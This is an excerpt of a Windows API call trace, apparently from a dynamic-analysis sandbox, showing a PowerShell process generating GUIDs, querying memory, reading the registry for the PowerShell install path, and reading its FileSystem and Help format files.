	[0111.659] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc21f5b19, Data2=0x704, Data3=0x499a, Data4=([0]=0xa9, [1]=0x9, [2]=0x8, [3]=0x53, [4]=0xbc, [5]=0x9e, [6]=0x23, [7]=0xb9))) returned 0x0
	[0111.660] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x957d7adb, Data2=0x22ae, Data3=0x4111, Data4=([0]=0xa5, [1]=0x3, [2]=0x3d, [3]=0x11, [4]=0xbc, [5]=0xe0, [6]=0x66, [7]=0x2d))) returned 0x0
	[0111.660] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xab5360a9, Data2=0x830c, Data3=0x46b8, Data4=([0]=0x9d, [1]=0x24, [2]=0x72, [3]=0xa3, [4]=0x4c, [5]=0x6e, [6]=0xa, [7]=0xf6))) returned 0x0
	[0111.660] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb256bc9, Data2=0x6ebb, Data3=0x4c46, Data4=([0]=0x96, [1]=0xda, [2]=0x70, [3]=0x38, [4]=0x7d, [5]=0xba, [6]=0xbc, [7]=0xd9))) returned 0x0
	[0111.660] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x31aba53c, Data2=0xc7e9, Data3=0x42b4, Data4=([0]=0x8e, [1]=0xa9, [2]=0x1e, [3]=0xe1, [4]=0x9e, [5]=0xbe, [6]=0x28, [7]=0x35))) returned 0x0
	[0111.660] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfd516bf9, Data2=0x8c3f, Data3=0x44f9, Data4=([0]=0x9c, [1]=0x78, [2]=0xe, [3]=0xf2, [4]=0xb6, [5]=0x85, [6]=0x40, [7]=0x7))) returned 0x0
	[0111.661] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf1e4c1d2, Data2=0x5659, Data3=0x4f82, Data4=([0]=0x9b, [1]=0x10, [2]=0x2, [3]=0x44, [4]=0x5, [5]=0x1a, [6]=0x2d, [7]=0x3e))) returned 0x0
	[0111.661] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbff7a357, Data2=0xfa1, Data3=0x4ff0, Data4=([0]=0xa3, [1]=0xda, [2]=0xc9, [3]=0xac, [4]=0xd9, [5]=0x6c, [6]=0x18, [7]=0x4))) returned 0x0
	[0111.661] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.661] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.662] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.663] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2b39262e, Data2=0x1d11, Data3=0x4ff6, Data4=([0]=0x8e, [1]=0x71, [2]=0xb9, [3]=0x4a, [4]=0x6e, [5]=0xd2, [6]=0x9, [7]=0xf5))) returned 0x0
	[0111.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.663] SetErrorMode (uMode=0x1) returned 0x1
	[0111.663] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.664] GetFileType (hFile=0x330) returned 0x1
	[0111.664] SetErrorMode (uMode=0x1) returned 0x1
	[0111.664] GetFileType (hFile=0x330) returned 0x1
	[0111.664] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.665] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.672] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.672] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.673] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.673] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.673] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x119, lpOverlapped=0x0) returned 1
	[0111.674] ReadFile (in: hFile=0x330, lpBuffer=0x35f63c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35f63c8*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.674] CloseHandle (hObject=0x330) returned 1
	[0111.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.674] SetErrorMode (uMode=0x1) returned 0x1
	[0111.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0111.674] SetErrorMode (uMode=0x1) returned 0x1
	[0111.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.674] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.675] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.675] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.675] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.675] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.675] RegCloseKey (hKey=0x330) returned 0x0
	[0111.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.677] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.677] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x86dcd849, Data2=0x3d73, Data3=0x45a4, Data4=([0]=0x80, [1]=0x62, [2]=0x11, [3]=0xda, [4]=0x53, [5]=0x74, [6]=0xde, [7]=0x4c))) returned 0x0
	[0111.677] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.677] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x70731817, Data2=0xd3a4, Data3=0x45f7, Data4=([0]=0xbc, [1]=0x7, [2]=0xe6, [3]=0xe7, [4]=0x28, [5]=0xd3, [6]=0x3c, [7]=0xb5))) returned 0x0
	[0111.678] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x762ee1c4, Data2=0x7ae7, Data3=0x46f8, Data4=([0]=0xb0, [1]=0x2d, [2]=0xf9, [3]=0x5c, [4]=0x17, [5]=0x6a, [6]=0xef, [7]=0x95))) returned 0x0
	[0111.678] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbb9ca3b8, Data2=0xb44c, Data3=0x4d79, Data4=([0]=0x98, [1]=0xb8, [2]=0xe8, [3]=0xf3, [4]=0x41, [5]=0x6, [6]=0x84, [7]=0xf0))) returned 0x0
	[0111.678] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.678] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.679] SetErrorMode (uMode=0x1) returned 0x1
	[0111.679] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.679] GetFileType (hFile=0x330) returned 0x1
	[0111.679] SetErrorMode (uMode=0x1) returned 0x1
	[0111.679] GetFileType (hFile=0x330) returned 0x1
	[0111.679] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.680] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.681] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.681] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.681] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.682] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.682] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.682] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.683] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.683] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.683] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.683] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.684] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.684] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.684] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.684] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.685] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.686] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.686] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.686] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.686] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.687] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.687] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.687] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.687] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.687] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.688] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.690] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.690] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.691] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.691] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.691] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.691] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.691] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.692] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
